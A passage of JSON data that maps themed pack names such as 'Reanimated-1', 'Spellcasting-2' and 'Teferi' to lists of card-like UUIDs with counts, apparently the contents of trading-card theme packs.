"id": "b92c8925-ecfc-4ece-b83a-f12e98a938ab",
"count": 1
},
{
"id": "3279314f-d639-4489-b2ab-3621bb3ca64b",
"count": 1
}
],
"Reanimated-1": [
{
"id": "83437022-ba00-4370-83c2-ce1260336fcc",
"count": 1
},
{
"id": "4fefd7f9-57ff-41bb-aef6-b1d568a7588b",
"count": 1
},
{
"id": "beed7579-f4f1-4545-9653-4c1179e88dc8",
"count": 1
},
{
"id": "c0bba170-5176-4fab-a10d-e23d70128875",
"count": 1
},
{
"id": "c9cd537c-e40e-438f-a751-e0ad8f6e6283",
"count": 1
},
{
"id": "405c096c-a94b-4817-8c7f-f0551f6513e3",
"count": 1
},
{
"id": "d9dc87b3-60b2-4cf8-b620-334700db1aa9",
"count": 1
},
{
"id": "e49bddc9-0b0b-4d6d-a708-019356f9649e",
"count": 1
},
{
"id": "753d3152-da9d-48af-98b0-34efb990205d",
"count": 1
},
{
"id": "ecb5fb06-d7b3-4871-a530-9004110596ad",
"count": 1
},
{
"id": "652271a0-80e8-4b9b-8823-26c1528378fc",
"count": 1
},
{
"id": "660ec88f-2063-404a-853e-c985e21d17b0",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "3810ec60-3f93-46c0-af39-7628b77bacec",
"count": 7
}
],
"Reanimated-2": [
{
"id": "31df3d95-bbdb-449d-9601-4fa844c3c640",
"count": 1
},
{
"id": "beed7579-f4f1-4545-9653-4c1179e88dc8",
"count": 1
},
{
"id": "c0bba170-5176-4fab-a10d-e23d70128875",
"count": 1
},
{
"id": "a1b4f7ec-ea2e-4d90-98cd-0c92bd9f64c1",
"count": 1
},
{
"id": "c9cd537c-e40e-438f-a751-e0ad8f6e6283",
"count": 1
},
{
"id": "405c096c-a94b-4817-8c7f-f0551f6513e3",
"count": 1
},
{
"id": "d9dc87b3-60b2-4cf8-b620-334700db1aa9",
"count": 1
},
{
"id": "753d3152-da9d-48af-98b0-34efb990205d",
"count": 1
},
{
"id": "ecb5fb06-d7b3-4871-a530-9004110596ad",
"count": 1
},
{
"id": "c5776bc9-7295-4143-a453-64e3c681f8e7",
"count": 1
},
{
"id": "652271a0-80e8-4b9b-8823-26c1528378fc",
"count": 1
},
{
"id": "660ec88f-2063-404a-853e-c985e21d17b0",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "3810ec60-3f93-46c0-af39-7628b77bacec",
"count": 7
}
],
"Reanimated-3": [
{
"id": "beed7579-f4f1-4545-9653-4c1179e88dc8",
"count": 1
},
{
"id": "c0bba170-5176-4fab-a10d-e23d70128875",
"count": 1
},
{
"id": "c9cd537c-e40e-438f-a751-e0ad8f6e6283",
"count": 1
},
{
"id": "d3c5eb7a-abb2-46bd-8fbd-19af63e70c9c",
"count": 1
},
{
"id": "405c096c-a94b-4817-8c7f-f0551f6513e3",
"count": 1
},
{
"id": "d9dc87b3-60b2-4cf8-b620-334700db1aa9",
"count": 1
},
{
"id": "8b39ee60-c467-4145-8ca7-123eef01791e",
"count": 1
},
{
"id": "753d3152-da9d-48af-98b0-34efb990205d",
"count": 1
},
{
"id": "5f1cdcba-a04a-4a2f-8bc1-0dd7fa03754d",
"count": 1
},
{
"id": "ecb5fb06-d7b3-4871-a530-9004110596ad",
"count": 1
},
{
"id": "660ec88f-2063-404a-853e-c985e21d17b0",
"count": 1
},
{
"id": "c9ce5007-56ab-4361-8130-df48add1492b",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "3810ec60-3f93-46c0-af39-7628b77bacec",
"count": 7
}
],
"Reanimated-4": [
{
"id": "31df3d95-bbdb-449d-9601-4fa844c3c640",
"count": 1
},
{
"id": "beed7579-f4f1-4545-9653-4c1179e88dc8",
"count": 1
},
{
"id": "c0bba170-5176-4fab-a10d-e23d70128875",
"count": 1
},
{
"id": "c9cd537c-e40e-438f-a751-e0ad8f6e6283",
"count": 1
},
{
"id": "a1b4f7ec-ea2e-4d90-98cd-0c92bd9f64c1",
"count": 1
},
{
"id": "405c096c-a94b-4817-8c7f-f0551f6513e3",
"count": 1
},
{
"id": "d9dc87b3-60b2-4cf8-b620-334700db1aa9",
"count": 1
},
{
"id": "753d3152-da9d-48af-98b0-34efb990205d",
"count": 1
},
{
"id": "ecb5fb06-d7b3-4871-a530-9004110596ad",
"count": 1
},
{
"id": "660ec88f-2063-404a-853e-c985e21d17b0",
"count": 1
},
{
"id": "7c0e1064-47c3-4f03-a1f2-3bcb356db82b",
"count": 1
},
{
"id": "db574719-746a-433e-a5be-06d232a01021",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "3810ec60-3f93-46c0-af39-7628b77bacec",
"count": 7
}
],
"Rogues-1": [
{
"id": "2eb69961-0053-476f-b58e-20b6df0e2649",
"count": 1
},
{
"id": "381b4e3b-85d7-4f61-b395-f278f212bda7",
"count": 1
},
{
"id": "f7b6e993-1988-4b6d-970e-be71d95cf21a",
"count": 1
},
{
"id": "d61b4b71-3cbb-4422-8ce7-657ca3bb6a82",
"count": 1
},
{
"id": "c894372f-7d28-4035-b45a-384c5bf8fd1f",
"count": 1
},
{
"id": "487aced8-e018-4c93-8e13-bb68b43096a4",
"count": 1
},
{
"id": "85b4b7f9-dfc6-4995-bd41-ff04c98d4c37",
"count": 1
},
{
"id": "a8962e7d-b14d-41b5-8805-17490b6c32bf",
"count": 1
},
{
"id": "6e4c9574-1ee3-461e-848f-8f02c6a8b7ee",
"count": 1
},
{
"id": "2b85a552-2119-4d9c-b7c1-c09c2d9f2f38",
"count": 1
},
{
"id": "4e8dd5c5-823a-47f2-8b12-8005d89fe948",
"count": 1
},
{
"id": "794fe9d4-2af4-40b0-bbb2-8015b6206972",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "c8ea7816-e501-4384-9176-61819a1784f6",
"count": 7
}
],
"Rogues-2": [
{
"id": "11f7bdf8-505e-4ed2-8a3b-aba263afd196",
"count": 1
},
{
"id": "4cd6d782-ce5a-4994-8310-34faf9c41de2",
"count": 1
},
{
"id": "381b4e3b-85d7-4f61-b395-f278f212bda7",
"count": 1
},
{
"id": "d61b4b71-3cbb-4422-8ce7-657ca3bb6a82",
"count": 1
},
{
"id": "c894372f-7d28-4035-b45a-384c5bf8fd1f",
"count": 1
},
{
"id": "487aced8-e018-4c93-8e13-bb68b43096a4",
"count": 1
},
{
"id": "85b4b7f9-dfc6-4995-bd41-ff04c98d4c37",
"count": 1
},
{
"id": "a8962e7d-b14d-41b5-8805-17490b6c32bf",
"count": 1
},
{
"id": "6e4c9574-1ee3-461e-848f-8f02c6a8b7ee",
"count": 1
},
{
"id": "05d3b392-cbd0-437a-a21f-a36d5093a719",
"count": 1
},
{
"id": "4e8dd5c5-823a-47f2-8b12-8005d89fe948",
"count": 1
},
{
"id": "794fe9d4-2af4-40b0-bbb2-8015b6206972",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "c8ea7816-e501-4384-9176-61819a1784f6",
"count": 7
}
],
"Seismic": [
{
"id": "a2b4cbb7-c9ad-4320-9322-a6a3afbc4a50",
"count": 1
},
{
"id": "128f37ff-eb63-4417-87c2-96a3a026fcf4",
"count": 1
},
{
"id": "78c3c616-1f95-41b1-a624-79d6362d4f16",
"count": 1
},
{
"id": "a359f4a8-3c06-441a-81bd-e3773b122e45",
"count": 1
},
{
"id": "9dcec0d7-897e-4593-bd09-460207e28c90",
"count": 1
},
{
"id": "a5664b7d-b553-4e0a-93ec-3d70e8e4f63b",
"count": 1
},
{
"id": "2975ce11-589a-4da8-a016-854bbaeb869c",
"count": 1
},
{
"id": "feebd1ba-758f-4029-9f5c-19b07146b80d",
"count": 1
},
{
"id": "ecba926b-915c-4dd2-84f3-019775e1cc14",
"count": 1
},
{
"id": "7e22c791-6ef9-4f13-a14d-4f795f48bb1c",
"count": 1
},
{
"id": "de1aa8f9-8200-4ddd-9ab5-1a8181cc1792",
"count": 1
},
{
"id": "f8c54d41-683e-42fd-8aa4-371dddf3bcb3",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "cb524a84-34a4-43bf-9872-b4a053a141b5",
"count": 7
}
],
"Smashing-1": [
{
"id": "c3b633bf-a77e-4b78-b729-a83896abf17c",
"count": 1
},
{
"id": "6075e0a3-a0ab-4a11-8ad2-7dabb071d309",
"count": 1
},
{
"id": "e3132919-58a7-429f-8a0f-9210d3c2c734",
"count": 1
},
{
"id": "21a3f8d6-80ff-4292-871e-e19907841448",
"count": 1
},
{
"id": "869fb9f1-0d59-4874-aa52-ac665c3cc0e8",
"count": 1
},
{
"id": "76e42d07-57d9-4de4-8d41-eb42dd1573ed",
"count": 1
},
{
"id": "d47e9653-2a3a-4d37-8f3d-3dab4f468338",
"count": 1
},
{
"id": "8f42d773-c742-4465-b6d5-31feaba49146",
"count": 1
},
{
"id": "59fa8e8d-bcb8-47bf-b71a-df11c8d0f2c9",
"count": 1
},
{
"id": "e854e6a3-8684-43fa-9560-ef4c3b62c935",
"count": 1
},
{
"id": "55a95e99-4398-4263-90bc-1b0c544b18b1",
"count": 1
},
{
"id": "2ae12125-73a3-488b-98b8-9f982addac56",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "4e6bce91-f1e6-40d4-9ecc-cafa8d2586b6",
"count": 7
}
],
"Smashing-2": [
{
"id": "c3b633bf-a77e-4b78-b729-a83896abf17c",
"count": 1
},
{
"id": "6075e0a3-a0ab-4a11-8ad2-7dabb071d309",
"count": 1
},
{
"id": "e3132919-58a7-429f-8a0f-9210d3c2c734",
"count": 1
},
{
"id": "869fb9f1-0d59-4874-aa52-ac665c3cc0e8",
"count": 1
},
{
"id": "76e42d07-57d9-4de4-8d41-eb42dd1573ed",
"count": 1
},
{
"id": "d47e9653-2a3a-4d37-8f3d-3dab4f468338",
"count": 1
},
{
"id": "5b32bb8a-ff23-436d-8e63-bbaf05e830ca",
"count": 1
},
{
"id": "8f42d773-c742-4465-b6d5-31feaba49146",
"count": 1
},
{
"id": "07392a36-e63a-4648-b8df-1172403922eb",
"count": 1
},
{
"id": "55a95e99-4398-4263-90bc-1b0c544b18b1",
"count": 1
},
{
"id": "2ae12125-73a3-488b-98b8-9f982addac56",
"count": 1
},
{
"id": "973c166e-3e93-4ed5-b4c5-84dc158a8e4f",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "4e6bce91-f1e6-40d4-9ecc-cafa8d2586b6",
"count": 7
}
],
"Smashing-3": [
{
"id": "c3b633bf-a77e-4b78-b729-a83896abf17c",
"count": 1
},
{
"id": "6075e0a3-a0ab-4a11-8ad2-7dabb071d309",
"count": 1
},
{
"id": "e3132919-58a7-429f-8a0f-9210d3c2c734",
"count": 1
},
{
"id": "368ee4e3-c9eb-4898-99cd-bbe148936f99",
"count": 1
},
{
"id": "869fb9f1-0d59-4874-aa52-ac665c3cc0e8",
"count": 1
},
{
"id": "6c59a4db-5806-40da-8752-cec05af6bf51",
"count": 1
},
{
"id": "76e42d07-57d9-4de4-8d41-eb42dd1573ed",
"count": 1
},
{
"id": "d47e9653-2a3a-4d37-8f3d-3dab4f468338",
"count": 1
},
{
"id": "8f42d773-c742-4465-b6d5-31feaba49146",
"count": 1
},
{
"id": "e854e6a3-8684-43fa-9560-ef4c3b62c935",
"count": 1
},
{
"id": "2ae12125-73a3-488b-98b8-9f982addac56",
"count": 1
},
{
"id": "bb9c6068-cfd8-4371-b549-e474d573e52e",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "4e6bce91-f1e6-40d4-9ecc-cafa8d2586b6",
"count": 7
}
],
"Smashing-4": [
{
"id": "c3b633bf-a77e-4b78-b729-a83896abf17c",
"count": 1
},
{
"id": "dd1a398b-4551-4522-a90a-620c90bd92c7",
"count": 1
},
{
"id": "6075e0a3-a0ab-4a11-8ad2-7dabb071d309",
"count": 1
},
{
"id": "e3132919-58a7-429f-8a0f-9210d3c2c734",
"count": 1
},
{
"id": "99c40669-87fa-4b1e-885f-2d0a626c3a25",
"count": 1
},
{
"id": "869fb9f1-0d59-4874-aa52-ac665c3cc0e8",
"count": 1
},
{
"id": "76e42d07-57d9-4de4-8d41-eb42dd1573ed",
"count": 1
},
{
"id": "d47e9653-2a3a-4d37-8f3d-3dab4f468338",
"count": 1
},
{
"id": "8f42d773-c742-4465-b6d5-31feaba49146",
"count": 1
},
{
"id": "07392a36-e63a-4648-b8df-1172403922eb",
"count": 1
},
{
"id": "2ae12125-73a3-488b-98b8-9f982addac56",
"count": 1
},
{
"id": "cb0e6279-8a66-4124-9def-fa0c83c26db9",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "4e6bce91-f1e6-40d4-9ecc-cafa8d2586b6",
"count": 7
}
],
"Spellcasting-1": [
{
"id": "e7744fcf-2336-489d-bc05-f3fce78713a9",
"count": 1
},
{
"id": "869fb9f1-0d59-4874-aa52-ac665c3cc0e8",
"count": 1
},
{
"id": "dc5e8221-fc2d-4d90-80f3-729606648c54",
"count": 1
},
{
"id": "af648aaf-a8e0-4291-acf9-5f8533728f92",
"count": 1
},
{
"id": "7e84379a-369e-4a9f-8c8b-bf47ab524c4e",
"count": 1
},
{
"id": "b37c1b56-621a-4908-89b2-21622d195223",
"count": 1
},
{
"id": "9feaa623-3422-4997-af7b-f75074af5fa1",
"count": 1
},
{
"id": "07392a36-e63a-4648-b8df-1172403922eb",
"count": 1
},
{
"id": "59fa8e8d-bcb8-47bf-b71a-df11c8d0f2c9",
"count": 1
},
{
"id": "f4af156d-0fbf-4a4e-b0c1-db7e95be4903",
"count": 1
},
{
"id": "d7ac8bdd-851f-449d-a108-70578eabf254",
"count": 1
},
{
"id": "d4955455-c708-4f96-ba21-0a6de0e74336",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "c55498ad-f474-4805-b9e9-592ec1c8a8e5",
"count": 7
}
],
"Spellcasting-2": [
{
"id": "e7744fcf-2336-489d-bc05-f3fce78713a9",
"count": 1
},
{
"id": "869fb9f1-0d59-4874-aa52-ac665c3cc0e8",
"count": 1
},
{
"id": "6c957c94-3d2d-4b98-8990-cd8909462081",
"count": 1
},
{
"id": "dc5e8221-fc2d-4d90-80f3-729606648c54",
"count": 1
},
{
"id": "af648aaf-a8e0-4291-acf9-5f8533728f92",
"count": 1
},
{
"id": "b37c1b56-621a-4908-89b2-21622d195223",
"count": 1
},
{
"id": "218af707-cc60-407e-af20-e21879a0e902",
"count": 1
},
{
"id": "8383e698-0dd7-4f35-aecb-53f0ee746999",
"count": 1
},
{
"id": "07392a36-e63a-4648-b8df-1172403922eb",
"count": 1
},
{
"id": "59fa8e8d-bcb8-47bf-b71a-df11c8d0f2c9",
"count": 1
},
{
"id": "f4af156d-0fbf-4a4e-b0c1-db7e95be4903",
"count": 1
},
{
"id": "d4955455-c708-4f96-ba21-0a6de0e74336",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "c55498ad-f474-4805-b9e9-592ec1c8a8e5",
"count": 7
}
],
"Spellcasting-3": [
{
"id": "e7744fcf-2336-489d-bc05-f3fce78713a9",
"count": 1
},
{
"id": "47361f61-b717-4468-8050-5f28a8fe6754",
"count": 1
},
{
"id": "32d294e8-ed96-4584-b4f2-1b03ae6d1314",
"count": 1
},
{
"id": "869fb9f1-0d59-4874-aa52-ac665c3cc0e8",
"count": 1
},
{
"id": "dc5e8221-fc2d-4d90-80f3-729606648c54",
"count": 1
},
{
"id": "af648aaf-a8e0-4291-acf9-5f8533728f92",
"count": 1
},
{
"id": "7e84379a-369e-4a9f-8c8b-bf47ab524c4e",
"count": 1
},
{
"id": "b37c1b56-621a-4908-89b2-21622d195223",
"count": 1
},
{
"id": "07392a36-e63a-4648-b8df-1172403922eb",
"count": 1
},
{
"id": "59fa8e8d-bcb8-47bf-b71a-df11c8d0f2c9",
"count": 1
},
{
"id": "f4af156d-0fbf-4a4e-b0c1-db7e95be4903",
"count": 1
},
{
"id": "cdb5eab0-5397-4c00-8cef-7d3baf38a171",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "c55498ad-f474-4805-b9e9-592ec1c8a8e5",
"count": 7
}
],
"Spellcasting-4": [
{
"id": "e7744fcf-2336-489d-bc05-f3fce78713a9",
"count": 1
},
{
"id": "869fb9f1-0d59-4874-aa52-ac665c3cc0e8",
"count": 1
},
{
"id": "6c957c94-3d2d-4b98-8990-cd8909462081",
"count": 1
},
{
"id": "dc5e8221-fc2d-4d90-80f3-729606648c54",
"count": 1
},
{
"id": "af648aaf-a8e0-4291-acf9-5f8533728f92",
"count": 1
},
{
"id": "b37c1b56-621a-4908-89b2-21622d195223",
"count": 1
},
{
"id": "07392a36-e63a-4648-b8df-1172403922eb",
"count": 1
},
{
"id": "59fa8e8d-bcb8-47bf-b71a-df11c8d0f2c9",
"count": 1
},
{
"id": "f4af156d-0fbf-4a4e-b0c1-db7e95be4903",
"count": 1
},
{
"id": "8257c205-00cd-4d41-bd58-098575ea2343",
"count": 1
},
{
"id": "55a3153e-4259-4e03-bf79-8979d3c0db36",
"count": 1
},
{
"id": "bd0b8aee-fbfb-470f-9ac2-64fce0b4b2fb",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "c55498ad-f474-4805-b9e9-592ec1c8a8e5",
"count": 7
}
],
"Spirits-1": [
{
"id": "52b2d108-16f2-4d9b-abc8-83ee3d2e8baf",
"count": 1
},
{
"id": "48b3c3e3-151f-4f16-bb40-167978180bbc",
"count": 1
},
{
"id": "87c1aaff-ab26-437e-a88a-494683aec831",
"count": 1
},
{
"id": "768c0715-416c-4316-98ef-ff90bb3112ae",
"count": 1
},
{
"id": "8cbac0e4-f79f-476d-b410-d19ab3696606",
"count": 1
},
{
"id": "7d6d0c71-d1c8-4eb0-96e7-b3325d5fb4c0",
"count": 1
},
{
"id": "0360d27b-37e1-4e00-9cfc-b574efc38ea0",
"count": 1
},
{
"id": "94c1f80e-65b7-4534-bfd4-1ae88274945b",
"count": 1
},
{
"id": "2600a51b-0dae-431e-a0a7-2b1421706a6a",
"count": 1
},
{
"id": "393fc485-d3c1-4826-933d-89f66df769d4",
"count": 1
},
{
"id": "a48ebd79-95d7-4860-9785-45e34a94755d",
"count": 1
},
{
"id": "f5ed9f08-56e8-4e24-aae2-05270d7c1ba8",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "e6cd2ccc-3148-4507-856d-55140c54d09d",
"count": 7
}
],
"Spirits-2": [
{
"id": "52b2d108-16f2-4d9b-abc8-83ee3d2e8baf",
"count": 1
},
{
"id": "48b3c3e3-151f-4f16-bb40-167978180bbc",
"count": 1
},
{
"id": "768c0715-416c-4316-98ef-ff90bb3112ae",
"count": 1
},
{
"id": "505e7f2c-c040-427a-a3a1-e7b36066e4fe",
"count": 1
},
{
"id": "8cbac0e4-f79f-476d-b410-d19ab3696606",
"count": 1
},
{
"id": "7d6d0c71-d1c8-4eb0-96e7-b3325d5fb4c0",
"count": 1
},
{
"id": "0360d27b-37e1-4e00-9cfc-b574efc38ea0",
"count": 1
},
{
"id": "393fc485-d3c1-4826-933d-89f66df769d4",
"count": 1
},
{
"id": "b832abcc-9ffd-47bf-827a-01b303c610ee",
"count": 1
},
{
"id": "b19de7a5-c291-405b-a2e6-8d3ac56e6570",
"count": 1
},
{
"id": "a48ebd79-95d7-4860-9785-45e34a94755d",
"count": 1
},
{
"id": "f5ed9f08-56e8-4e24-aae2-05270d7c1ba8",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "e6cd2ccc-3148-4507-856d-55140c54d09d",
"count": 7
}
],
"Spooky-1": [
{
"id": "80c57801-cc6f-4f1f-b401-7f621fdcfaaa",
"count": 1
},
{
"id": "f8067745-35b6-4abd-9ae9-712159a26c89",
"count": 1
},
{
"id": "c0bba170-5176-4fab-a10d-e23d70128875",
"count": 1
},
{
"id": "f35fd9cd-795f-4a8b-b2e9-648f6273927e",
"count": 1
},
{
"id": "94a6644a-52e6-454e-a479-44b086240974",
"count": 1
},
{
"id": "56a95546-c45a-4da5-b1e8-d5658b5b7d53",
"count": 1
},
{
"id": "f1d6e32e-6479-48b3-93ae-da5378c09bb1",
"count": 1
},
{
"id": "3dc48b87-62cb-48f6-8979-e6fb98717b52",
"count": 1
},
{
"id": "2b85a552-2119-4d9c-b7c1-c09c2d9f2f38",
"count": 1
},
{
"id": "9c0f60a6-b5c8-4704-8b61-94e8fc463e5d",
"count": 1
},
{
"id": "23986add-b33d-4bad-86f3-e2d0f99cf949",
"count": 1
},
{
"id": "89e2bc57-8f18-4ba1-a11b-9d69d029f56a",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "85f7b339-cce2-421e-83b8-1764c53dee47",
"count": 7
}
],
"Spooky-2": [
{
"id": "80c57801-cc6f-4f1f-b401-7f621fdcfaaa",
"count": 1
},
{
"id": "f8067745-35b6-4abd-9ae9-712159a26c89",
"count": 1
},
{
"id": "c0bba170-5176-4fab-a10d-e23d70128875",
"count": 1
},
{
"id": "f35fd9cd-795f-4a8b-b2e9-648f6273927e",
"count": 1
},
{
"id": "94a6644a-52e6-454e-a479-44b086240974",
"count": 1
},
{
"id": "f1d6e32e-6479-48b3-93ae-da5378c09bb1",
"count": 1
},
{
"id": "870ebc0b-b748-4a21-b939-a48811451bba",
"count": 1
},
{
"id": "b5e78a44-fff3-4cbf-929b-8dfed4e45d62",
"count": 1
},
{
"id": "2b85a552-2119-4d9c-b7c1-c09c2d9f2f38",
"count": 1
},
{
"id": "23986add-b33d-4bad-86f3-e2d0f99cf949",
"count": 1
},
{
"id": "fc676672-1aeb-420a-b909-5a3215cc2ca6",
"count": 1
},
{
"id": "89e2bc57-8f18-4ba1-a11b-9d69d029f56a",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "85f7b339-cce2-421e-83b8-1764c53dee47",
"count": 7
}
],
"Spooky-3": [
{
"id": "80c57801-cc6f-4f1f-b401-7f621fdcfaaa",
"count": 1
},
{
"id": "f8067745-35b6-4abd-9ae9-712159a26c89",
"count": 1
},
{
"id": "c0bba170-5176-4fab-a10d-e23d70128875",
"count": 1
},
{
"id": "f35fd9cd-795f-4a8b-b2e9-648f6273927e",
"count": 1
},
{
"id": "94a6644a-52e6-454e-a479-44b086240974",
"count": 1
},
{
"id": "56a95546-c45a-4da5-b1e8-d5658b5b7d53",
"count": 1
},
{
"id": "f1d6e32e-6479-48b3-93ae-da5378c09bb1",
"count": 1
},
{
"id": "ae5d7f15-a86f-4eaa-8280-2e7f73c8ce3a",
"count": 1
},
{
"id": "9342052f-6b6b-40b9-bbc9-7ba3e8365fe1",
"count": 1
},
{
"id": "2b85a552-2119-4d9c-b7c1-c09c2d9f2f38",
"count": 1
},
{
"id": "9b53ce1b-9353-42ad-89a0-36e907ba576a",
"count": 1
},
{
"id": "89e2bc57-8f18-4ba1-a11b-9d69d029f56a",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "85f7b339-cce2-421e-83b8-1764c53dee47",
"count": 7
}
],
"Spooky-4": [
{
"id": "80c57801-cc6f-4f1f-b401-7f621fdcfaaa",
"count": 1
},
{
"id": "f8067745-35b6-4abd-9ae9-712159a26c89",
"count": 1
},
{
"id": "c0bba170-5176-4fab-a10d-e23d70128875",
"count": 1
},
{
"id": "f35fd9cd-795f-4a8b-b2e9-648f6273927e",
"count": 1
},
{
"id": "94a6644a-52e6-454e-a479-44b086240974",
"count": 1
},
{
"id": "f1d6e32e-6479-48b3-93ae-da5378c09bb1",
"count": 1
},
{
"id": "ae5d7f15-a86f-4eaa-8280-2e7f73c8ce3a",
"count": 1
},
{
"id": "72bcfb24-1649-4c8f-ba76-346914d11572",
"count": 1
},
{
"id": "b5e78a44-fff3-4cbf-929b-8dfed4e45d62",
"count": 1
},
{
"id": "2b85a552-2119-4d9c-b7c1-c09c2d9f2f38",
"count": 1
},
{
"id": "89e2bc57-8f18-4ba1-a11b-9d69d029f56a",
"count": 1
},
{
"id": "1f51ced8-9384-4b8d-aa60-efb281ac9439",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "85f7b339-cce2-421e-83b8-1764c53dee47",
"count": 7
}
],
"Teferi": [
{
"id": "f4bb655d-8d62-4a79-9a9d-7384d1cb2cc0",
"count": 1
},
{
"id": "92c17066-c551-4aed-9258-1e5ed947385b",
"count": 1
},
{
"id": "5449d71c-5c1b-44c6-9407-0212aa3c3e3a",
"count": 1
},
{
"id": "c2776694-6183-498d-9a38-e4c5c9e78179",
"count": 1
},
{
"id": "a52e90c0-b012-4ce5-8462-1e33c7143de5",
"count": 1
},
{
"id": "2d1ff397-2445-459a-ae4e-7bf1cd48f490",
"count": 1
},
{
"id": "1455f59e-f487-4195-ab25-8fc7695903e4",
"count": 1
},
{
"id": "049955c6-63f5-4f80-8c60-34c890f3c71a",
"count": 1
},
{
"id": "323db259-d35e-467d-9a46-4adcb2fc107c",
"count": 1
},
{
"id": "4b153c2f-fc87-49bc-9d1e-d5e7e25b2142",
"count": 1
},
{
"id": "c38d1722-96b0-4756-9da9-fe18b1c80649",
"count": 1
},
{
"id": "c26450d4-125f-423d-b074-3c959460c242",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "24aa9fd2-54d9-40d9-9279-abd5bd6ff727",
"count": 7
}
],
"Tree Hugging-1": [
{
"id": "b8664d29-dacc-49cb-949f-e00ceeb75ff6",
"count": 1
},
{
"id": "3d0ec3bd-d894-4861-abcb-7b2e4f4de05c",
"count": 1
},
{
"id": "5f22116a-8b6a-4bbe-999f-7329e1e2b2d9",
"count": 1
},
{
"id": "d6e23afa-7e08-4049-baf0-d4d0134ba2c8",
"count": 1
},
{
"id": "4b0d8dec-e139-4565-9259-3c24c54c1d45",
"count": 1
},
{
"id": "46700ccc-0975-49d1-b3fc-edb1eda3b624",
"count": 1
},
{
"id": "f836b155-8829-460b-91f8-4cd00b988196",
"count": 1
},
{
"id": "f1d81cfc-cff8-4478-92b6-efbfc5084165",
"count": 1
},
{
"id": "ff69e6a8-f34f-4aea-9a54-c4b64ed3116c",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "8ea6c234-ede2-4543-ab8e-38d7a503a5e1",
"count": 1
},
{
"id": "77cf9d11-936f-4e02-8595-0cbcabaafb1e",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "a6712361-976a-4ef9-bae9-48505344904e",
"count": 7
}
],
"Tree Hugging-2": [
{
"id": "3d0ec3bd-d894-4861-abcb-7b2e4f4de05c",
"count": 1
},
{
"id": "5f22116a-8b6a-4bbe-999f-7329e1e2b2d9",
"count": 1
},
{
"id": "d6e23afa-7e08-4049-baf0-d4d0134ba2c8",
"count": 1
},
{
"id": "4b0d8dec-e139-4565-9259-3c24c54c1d45",
"count": 1
},
{
"id": "46700ccc-0975-49d1-b3fc-edb1eda3b624",
"count": 1
},
{
"id": "f836b155-8829-460b-91f8-4cd00b988196",
"count": 1
},
{
"id": "f1d81cfc-cff8-4478-92b6-efbfc5084165",
"count": 1
},
{
"id": "ff69e6a8-f34f-4aea-9a54-c4b64ed3116c",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "9d44ec73-169a-4354-8ee1-238b8abd8d81",
"count": 1
},
{
"id": "8ea6c234-ede2-4543-ab8e-38d7a503a5e1",
"count": 1
},
{
"id": "77cf9d11-936f-4e02-8595-0cbcabaafb1e",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "a6712361-976a-4ef9-bae9-48505344904e",
"count": 7
}
],
"Tree Hugging-3": [
{
"id": "b8664d29-dacc-49cb-949f-e00ceeb75ff6",
"count": 1
},
{
"id": "3d0ec3bd-d894-4861-abcb-7b2e4f4de05c",
"count": 1
},
{
"id": "5f22116a-8b6a-4bbe-999f-7329e1e2b2d9",
"count": 1
},
{
"id": "f1ccd23e-c883-474b-93e5-4131aa1e6e8a",
"count": 1
},
{
"id": "d6e23afa-7e08-4049-baf0-d4d0134ba2c8",
"count": 1
},
{
"id": "46700ccc-0975-49d1-b3fc-edb1eda3b624",
"count": 1
},
{
"id": "f836b155-8829-460b-91f8-4cd00b988196",
"count": 1
},
{
"id": "f1d81cfc-cff8-4478-92b6-efbfc5084165",
"count": 1
},
{
"id": "ff69e6a8-f34f-4aea-9a54-c4b64ed3116c",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "8ea6c234-ede2-4543-ab8e-38d7a503a5e1",
"count": 1
},
{
"id": "77cf9d11-936f-4e02-8595-0cbcabaafb1e",
"count": 1
},
{
